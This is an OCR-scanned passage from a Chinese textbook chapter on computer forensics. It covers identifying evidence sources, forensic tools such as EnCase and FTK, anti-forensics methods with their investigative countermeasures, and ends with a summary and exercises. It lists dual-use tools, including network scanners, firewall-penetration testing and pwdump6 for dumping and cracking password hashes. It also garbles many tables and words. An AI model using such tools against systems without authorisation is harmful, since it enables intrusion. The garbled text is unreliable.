的 安全 性 和 工作 过 程 的 可 靠 性 以 及 取证 程序 .证 据 固定 保全 是 否 符合 法 定 要 求 。 证 明 能 力 
即 审查 电子 证 据 的 客观 性 和 关联 性 ,结合 全 案 其 他 证 据 , 综 合 审查 电子 证 据 是 否 同 其 他 证 据 
相互 印证 ,相互 联系 ,建构 成 坚实 可 靠 的 证 据 体 系 ,并 据 此 认定 案件 的 真实 情况 。 

1. 设备 与 软件 来 源 鉴定 

硬件 设备 包括 CPU ,存储 设备 和 网 络 设备 (网 络 接口 卡 、 集 线 器 、 交 换 机 、 路 由 器 ) 等 , 提 
取 设 备 类 型 .序列 号 ID、IP 地 址 和 物理 MAC 地 址 等 信息 。 来 源 鉴 定 可 通过 扫描 与 信息 收 
集 。 如 利用 cheops 可 以 将 攻击 目标 所 在 的 网 络 拓扑 勾画 出 来 ,包括 各 种 服务 器 、 网 络 设备 、 
客户 端 操作 系统 以 及 各 节点 间 的 通信 信息 ;Nmap 可 以 扫描 判断 端口 、 服 务 和 系统 ; sniffer 
pro 可 以 绘制 网 络 拓 扑 与 各 节点 会 话 , 穷 取 共享 环境 下 的 应 用 会 话 ;Firetalk 可 以 测试 攻击 
途径 中 所 遇 防 火 墙 的 过 滤 规 则 ; Hping 可 以 对 防火 墙 进 行 穿 透 性 测试 ;漏洞 扫描 工具 如 
Nessus、Sss 和 流光 等 。 

软件 来 源 鉴定 要 根据 文件 扩展 名 摘要、 作者 名 ,软件 注 册 码 判 断 数据 来 自 某 一 个 软件 及 其 
作者 ,产生 时 间 。 鉴 定时 要 考虑 各 种 软件 运行 的 动态 特性 , Word 文件 的 特征 如 表 12.5 所 示 。 

2. IP 地 址 来 源 鉴定 

利用 信任 关系 .远程 登录 和 IP 堆栈 修改 等 方式 进行 IP 地 址 欺骗 是 进行 网 络 犯罪 的 一 
种 常用 手段 。IP 地 址 来 源 鉴 定 利 用 源 路 由 选项 或 路 由 回溯 法 即 沿路 由 逆向 逐 站 追溯 源 站 ， 
这 些 都 是 传统 DDoS 调查 方法 。 现 在 有 研究 者 开发 了 新 取证 协议 。 


表 12.5 Word 文档 软件 鉴定 表 


被 鉴定 软件 静态 特征 运行 中 特征 运行 后 残留 特征 
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ERE : 


字 取 证 技术 


摘要 特征 : 原始 作 
者 .最 后 保存 者 、 编 
辑 时 间 、 生 成 时 间 、 
修订 号 、 公 司 名 称 。 
注册 特征 : 每 个 
Office 文档 都 会 包 
含 类 似 标识 信息 。 
如 S -1-5-21-11772 
38915-1202660629- 
842925246-1000 


MS Word 


当 Office 


编辑 时 文档 证 书信 息 如 
A3BDA6FB5D97F5245AE8600 
E717538FB6FE19AE4， 
key 信息 如 10371F0D906B55A 
54BE3AC5A833B8D3E132B466 
B 都 包含 到 文档 中 。 

产生 错误 时 ,除了 在 
temp 目录 下 产生 tmp 或 tm0 
文件 ,还 发 送 报错 信息 到 系统 
日 二 


以 及 


的 使 用 记录 。 


正常 退出 特征 : 用 户 所 在 目录 的 
template 下 存储 本 次 文档 编辑 的 一 
部 分 信息 ; 在 % user% 目录 下 的 
Application Data—micsoft 一 office 存 
储 了 自 装 机 以 来 历次 的 删除 记录 、 文 
档 原来 所 在 的 目录 ,文档 名 ;在 系统 
本 身 %systemroot% 中 存在 每 个 程序 


异常 退出 特征 : 缓存 文件 中 存储 一 


上 志 部 分 恢复 信息 


3. 证 据 鉴定 过 程 


电子 证 据 的 系统 鉴定 过 程 如 图 12. 13 所 示 。 


开始 


描述 犯罪 事实 
和 鉴定 目标 


转换 为 系统 有 


鉴定 设备 


人 


He 
的 电子 证 据 


设备 来 源 分 析 


ss 


软件 来 源 分 析 


内 容 分 析 


和 


电子 证 据 与 犯罪 事实 


的 相关 鉴定 


保存 


| 


结果 ， 


生成 鉴定 报告 


图 12.13 证 据 鉴定 过 程 


ee 
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12.6 计算 机 取证 工具 


取证 技术 逐渐 走向 自动 化 ,智能 化 ,政府 与 各 专业 机 构 均 投 入 巨大 人 力 、 物 力 开发 计算 
机 取证 专用 工具 ,前 面 已 提 到 一 些 。 可 分 为 数字 证 据 获取 工具 和 证 据 分 析 工具 。 


12.6.1 用 于 数据 获取 的 取证 工具 


证 据 获取 的 工具 如 Higher Ground Software Inc. 公司 的 软件 Hard Drive Mechanic 可 
用 于 从 被 删除 的 、 被 格式 化 的 和 已 被 重新 分 区 的 硬盘 中 获取 数据 。Guidance Software 公司 
生产 的 硬件 设备 Fastbloc 可 用 于 Windows 操作 系统 下 计算 机 媒质 内 容 的 快速 镜像 。NTI 
公司 的 GetFree 可 从 活动 的 Windows Swap 分 区 中 恢复 数据 ,该 公司 的 软件 GetSlack 可 自 
动 搜集 系统 中 的 文件 碎片 并 将 其 写 人 一 个 统一 的 文件 。NTI 的 软件 系统 CRCMd5 可 用 于 
在 计算 机 犯罪 调查 过 程 中 保护 已 搜集 来 的 电子 证 据 , 保 证 其 不 被 改变 ,也 可 以 用 于 将 系统 从 
一 台 计 算 机 迁移 到 另 一 台 计 算 机 时 保障 系统 的 完整 性 。 该 公司 的 软件 SEIZED 可 用 于 保证 
用 户 无 法 对 正在 被 调查 的 计算 机 或 系统 进行 操作 。 另 外 ,该 公司 的 NTI-DOC 可 用 于 自动 
记录 电子 数据 产生 的 时 间 .日 期 及 文件 属性 。 

用 于 电子 数据 证 据 归 档 的 工具 首 推 NTI 公司 的 软件 ,其 他 工具 可 以 在 网 络 FIRST 
(www. first. org) .HTCIA (www. htcia. org) .CERT (www. cert. org) ISSA (www. issa. 
org) .SANS (www. sans. org) 、InfraGard (www. infragard. net) 和 Foundstone (www. 


foundstone. com) 搜 索 。 一 些 常 用 的 取证 工具 如 表 12.6 所 示 。 
表 12.6 一 些 常用 的 取证 工具 


工具 名 称 用 途 描 述 
auditpol 确定 系统 的 审核 策略 
reg 转 储 Windows 系统 注册 表 中 的 特定 信息 ( 键 ) 
regdump 以 文本 文件 格式 转 储 注册 表 
pwdump6 转 储 SAM 数据 库 , 可 破解 密码 
NTLast 监控 成 功 和 失败 的 系统 登录 
Sfind 侦 测 隐藏 在 NTFS 文件 流 中 的 文件 
Afind 扫描 文件 系统 , 找 出 在 某 时 段 内 被 访问 过 的 文件 
Dumpel 转 储 Windows 系统 的 事件 日 志 
Netstat 显示 当前 受害 系统 的 网 络 监听 程序 和 网 络 连接 
ARP 查看 受害 系统 的 地 址 解析 缓存 表 
ps 查看 UNIX 系统 进程 信息 
Who last 显示 系统 在 线 用 户 、 登 录用 户 信息 
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12.6.2 用 于 数据 分 析 的 取证 工具 


常用 的 电子 证 据 分 析 工 具有 开放 源 代码 软件 Coroners 工具 包 , 它 是 计算 机 犯罪 取证 检 
查 的 一 些 工 具 软 件 的 集合 。 专 门 的 商业 软件 Encase 是 基于 Windows 平台 ,提供 从 数据 发 
现 到 分 析 到 生成 报表 的 全 面 解决 方案 ; AccessData 是 用 于 获取 口令 的 软件 。 最 著名 的 是 
NTI 公司 的 软件 系统 Net Threat Analyzer, 能 发 现 系统 中 曾 发 生 过 的 E-mail 交流 ,因特网 
浏览 及 文件 上 传 下 载 等 活动 。 这 类 工具 中 最 著名 的 是 NTI 公司 的 软件 系统 Net Threat 
Analyzer。 该 软件 使 用 人 工 智能 中 的 模式 识别 技术 ,分 析 Slack 磁盘 空间 、 未 分 配 磁盘 空 
间 、 自 由 空间 中 所 包含 的 信息 ,研究 交换 文件 ,缓存 文件 、 临 时 文件 及 网 络 流动 数据 ,从 而 发 
现 系统 中 曾 发 生 过 的 E-mail 交流 、Internet 浏览 及 文件 上 传 下 载 等 活动 ,提取 出 与 犯罪 等 相 
关 的 内 容 。 表 12.7 列 出 了 一 些 计算 机 及 网 络 取证 分 析 的 资源 网 站 。 


表 12.7 一 些 计算 机 及 网 络 取证 分 析 的 资源 网 站 


资源 类 型 网 络 地 址 
TCT 取证 软件 包 http://www. fish. com/forensics/ 
Encase http://www. encase. com/ 
计算 机 取证 分 析 http://www. porcupine. org/forensics/ 
Computer Forensics Tool Testing(CFTT) http://www. cftt. nist. gov/ 
文件 及 介质 取证 工具 箱 Sleuth Kit http://www. sleuthkit. org/sleuthkit/index. php 
开放 源 代码 数字 取证 http://www. opensourceforensics. org/ 


EnCase 是 美国 Guidance 公司 的 产品 ,是 全 世界 法 律 实施 和 IT 安全 专业 人 士 使 用 的 排 
名 第 一 位 的 计算 机 犯罪 取证 软件 ,成 为 全 世界 计算 机 犯罪 调查 取证 的 标准 和 通用 平台 ,能 有 
效 保证 电子 证 据 的 完整 性 .可 信 性 、 准 确 性 ,包括 EnCase Forensic Edition( 取 证 版 EFE)、 
EDS-EnCase 解密 模块 、 VFS-EnCase 虚拟 文件 系统 、 PDE-EnCase 物理 磁盘 模拟 器 和 
EnCase Enterprise Edition( 企 业 版 EEE) 等 ,具有 证 据 获 取证 据 分 析 和 证 据 报告 三 
功能 。 

德国 X-Ways 公司 最 著名 的 计算 机 法 证 工具 X-Ways Forensics, 为 计算 机 法 证 人 员 提 
供 了 一 个 功能 强大 的 、 综 合 的 取证 、 分 析 环 境 , 包 含 WinHex 软件 的 所 有 基本 功能 ,并 增加 
了 很 多 特有 功能 ,也 被 称 为 WinHex 法 证 版 。 

在 线 网 络 取证 工具 F-Response 可 以 在 开机 状态 下 直接 取证 ,避免 丢失 易 失 性 数据 ;在 
局 域 网 范围 内 远程 取证 ,支持 VPN 连接 ,具有 可 靠 的 加 密 连 接 、 只 读 方式 ; 与 X-Ways 
Forensics、Smart、MacForensicsLab、 FinalForensics 和 Intella 等 取证 软件 全 面 配合 , 对 
Windows、MacOS 和 Linux 三 种 操作 系统 都 可 成 功 实现 在 线 分 析 和 取证 。 

FTK(Forensic Toolkit) 司 法 分 析 软 件 是 世界 上 公认 的 计算 机 取证 调查 的 必 备 工具 , 功 
能 强大 、 界 面 友 好 、 使 用 简单 。 可 以 创建 镜像 .查看 注册 表 、 破 解 加 密 文件 .调查 分 析 案 件 和 
生成 报告 一 体 化 ,恢复 超过 80 多 种 加 密 文件 类 型 的 密码 ,集成 Oracle 数据 库 和 增强 搜索 功 
能 ,具有 强大 的 处 理 能 力 和 速度 。 
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当前 的 计算 机 取证 技术 还 存在 很 大 的 局 限 性 ,实际 上 很 多 取证 分 析 软 件 还 仅仅 可 以 恢 
复 使 用 rm 或 strip 命令 删除 的 文件 ,这 让 一 些 计 算 机 犯罪 者 有 机 可 乘 。 于 是 针对 计算 机 取 
证 的 反 取证 技术 悄悄 出 现 了 。 

计算 机 反 取 证 技术 就 是 删除 或 者 隐藏 证 据 使 取证 调查 无 效 。 目 前 , 反 取证 技术 分 为 三 
类 : 数据 加 密 、 数 据 隐藏 和 数据 擦 除 。 这 些 技术 结合 起 来 使 用 ,让 取证 工作 的 效果 大 打折 
扣 。 几 种 反 取证 技术 与 调查 方法 如 表 12. 8 所 示 。 


表 12.8 几 种 反 取证 技术 与 调查 方法 


种 类 隐藏 技术 调查 方法 
数据 加 密 。 | 加 密 必须 先 定位 后 破解 
模糊 数据 “| 压缩 \ 编 码 必须 先 定位 后 破解 
猜测 或 者 找到 编码 的 破译 密 钥 。 在 文件 系统 中 
隐藏 数据 “| 编码 .隐藏 地 方 .名 字 混 淆 进行 关键 字 搜 索 ,寻找 异常 的 地 方 。 使 用 基于 
内 容 进行 鉴别 的 工具 
数据 擦 除 ”| 命令 或 专业 工具 擦 除 系统 命令 删除 的 可 以 使 用 工具 恢复 或 部 分 恢复 
a 2 将 数据 从 目标 主机 上 移 走 ,到 确认 没 被 污染 的 
帮 丹 调查 。 | 修改 系统 命令 或 配置 ,名 字 混 淆 | 机器 上 进行 分 折 


数据 加 密 就 是 对 原来 为 明文 的 文件 或 数据 按 某 种 算法 进行 处 理 ,使 其 成 为 不 可 读 的 一 
段 代 码 或 密 文 , 是 采用 信息 安全 的 核心 技术 即 密码 技术 将 资料 加 密 。 

隐藏 数据 是 通过 技术 隐藏 实际 存在 的 数据 ,使 之 不 可 见 。 操 作 系统 总 是 隐藏 了 一 些 数 
据 , 这 种 隐藏 并 不 是 故意 为 躲避 调查 。 计 算 机 取证 过 程 中 最 具 挑 战 性 的 问题 之 一 就 是 数据 
被 嫌疑 人 有 意 地 隐藏 起 来 了 。 证 据 数据 可 能 被 隐藏 在 不 显眼 的 地 方 ,交换 空间 或 系统 数据 
文件 。 取 证 时 总 是 假设 被 检查 的 系统 里 可 能 含有 隐藏 的 数据 。 采 用 的 技术 有 编码 、 隐 写 术 、 
隐藏 名 字 \ 假 造 名 字 、 隐 藏 文件 ,没有 名 字 、 伪 装 成 系统 文件 , 存 于 计算 机 之 外 。 

数据 擦 除 是 最 有 效 的 反 取证 方法 ,是 指 清除 所 有 可 能 的 证 据 ( 索 引 节点 目录 文件 和 数据 
块 中 的 原始 数据 )。 原 始 数据 不 存在 了 ,取证 自然 无 法 进行 。 当 在 存储 器 中 的 数据 不 能 被 删 
除 时 ,专业 的 数据 擦 除 软 件 能 习惯 于 用 固定 数据 模式 写 在 整个 磁盘 区 域 , 因 此 能 有 效 地 擦 除 
磁盘 上 的 数据 。 

模糊 数据 是 改变 数据 内 容 , 任 何人 都 可 以 看 到 该 数据 却 不 能 理解 其 中 意义 。 一 般 采 用 
压缩 技术 、 编 码 。 

欺骗 调查 应 属于 数据 隐藏 ,数据 没有 被 修改 ,利用 操作 系统 修改 配置 使 数据 不 直接 
可 见 。 


本 章 小 结 


计算 机 犯罪 是 以 计算 机 或 网 络 为 工具 对 以 计算 机 系统 资产 ,网 络 信息 安全 进行 侵犯 的 
犯罪 行为 。 数 字 证 据 就 是 在 计算 机 或 在 计算 机 系统 运行 过 程 中 产生 的 、 以 其 记录 的 内 容 来 
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证 实 案 件 事 实 的 电磁 记录 , 即 具 有 侦查 作用 和 证 据 价 值 的 电子 数据 ,可 以 分 为 字 处 理 文件 、 
图 形 处 理 文件 ,数据库 文件 .程序 文件 .影音 像 文件 和 其 他 数据 文件 等 。 计 算 机 取证 是 使 用 
软件 和 工具 ,按照 一 些 预先 定义 的 程序 全 面 地 检查 计算 机 系统 ,对 以 磁 介 质 编码 信息 方式 存 
储 的 计算 机 证 据 的 保护 确认、 提取 和 归档 。 

计算 机 取证 的 主要 原则 是 对 于 电子 证 据 应 尽早 收集 证 据 , 并 保证 其 没有 受到 任何 破坏 。 
分 析 计 算 机 数据 与 案件 事实 有 无 关联 ,关联 程度 如 何 ,是 否 实质 性 关联 ,数据 是 否 被 伪造 、 变 
化 或 剪辑 ,修改 过 。 实 施 数 字 取 证 应 当 遵循 符合 程序 .共同 监督 .保护 隐私 、 影 响 最 小 .证 据 
连续 、 原 汁 原味 等 原则 。 取 证 的 基本 步骤 包括 保护 现场 .证 据 搜索 与 发 现 . 证 据 确认 与 固定 、 
证 据 提 取 ,证据 分 析 和 证 据 提交 。 

计算 机 取证 技术 包括 数据 获取 技术 ,数据 分 析 技 术 和 加 密 解 密 技 术 等 。 其 中 数据 获取 
技术 包括 对 磁盘 空间 、 未 分 配 空间 和 自由 空间 中 包含 的 信息 的 发 所 技术 ;对 交换 文件 ,缓存 
文件 ,临时 文件 中 包含 的 信息 的 复原 技术 ;计算 机 在 某 一 特定 时 刻 活动 内 存 中 数据 的 收集 技 
术 , 如 内 存 数据 dump; 网 络 流动 数据 的 获取 技术 等 。 

电子 数据 采集 包括 外 存 文件 和 内 存 数 据 。 电 子 证 据 获 取 主 要 指数 据 采集 ,包括 外 存 文 
件 和 内 存 数 据 。 采 集 技 术 有 数据 恢复 .日 志 采集 和 内 存 数据 采集 等 。 

证 据 相 关 文件 有 处 理 文件 .数据 文件 和 历史 记录 等 ,包括 普通 文件 ,临时 文件 .日 志 
件 、 注 册 表 、 交 换文 件 或 页 面 文件 .浏览 器 的 历史 和 收藏 夹 .Cookies、 隐 含 文件 、 安 装 程序 的 
残留 物 等 。 

电子 证 据 分 析 是 通过 对 电子 证 据 的 数据 流 或 信息 流 中 寻找 、 匹 配 关键 词 或 关键 短语 ,以 
及 对 数据 中 包含 的 系统 曾 进行 的 Internet 访问 的 URL、E-mail 交流 的 邮件 地 址 进行 基于 模 
糊 逻 辑 的 分 析 来 试图 发 现 电子 证 据 与 犯罪 事实 之 间 的 客观 联系 。 

电子 证 据 来 源 分 析 即 审查 和 鉴定 数据 的 来 源 。 电 子 证 据 审查 包括 证 据 的 合法 性 和 证 明 
能 力 审查 ,审查 的 过 程 可 能 需要 鉴定 。 

反 取 证 就 是 删除 或 者 隐藏 证 据 使 取证 调查 无 效 。 主 要 分 为 三 类 : 数据 加 密 、 数 据 隐藏 
和 数据 擦 除 。 


习 题 12 


12, 
12. 
12. 
12. 
12. 
1 
12, 
12, 


什么 是 计算 机 犯罪 ?什么 是 电子 证 据 ? 电子 证 据 有 哪些 分 类 和 特点 ? 
什么 是 计算 机 取证 ? 

传统 静态 取证 模型 和 动态 取证 模型 有 什么 异同 ? 

计算 机 取证 有 哪些 技术 ? 分 别 采 用 哪些 工具 ? 

什么 是 电子 证 据 分 析 ? 简 述 日 志 分 析 过 程 和 作用 。 

简 述 证 据 鉴定 过 程 。 

如 何 从 磁盘 恢复 删除 数据 ? 如何 从 内 存 恢 复 程序 代码 ? 

反 取 证 技术 有 哪些 ? 分 别 使 用 什么 调查 方法 ? 


co 中 思 性 性 
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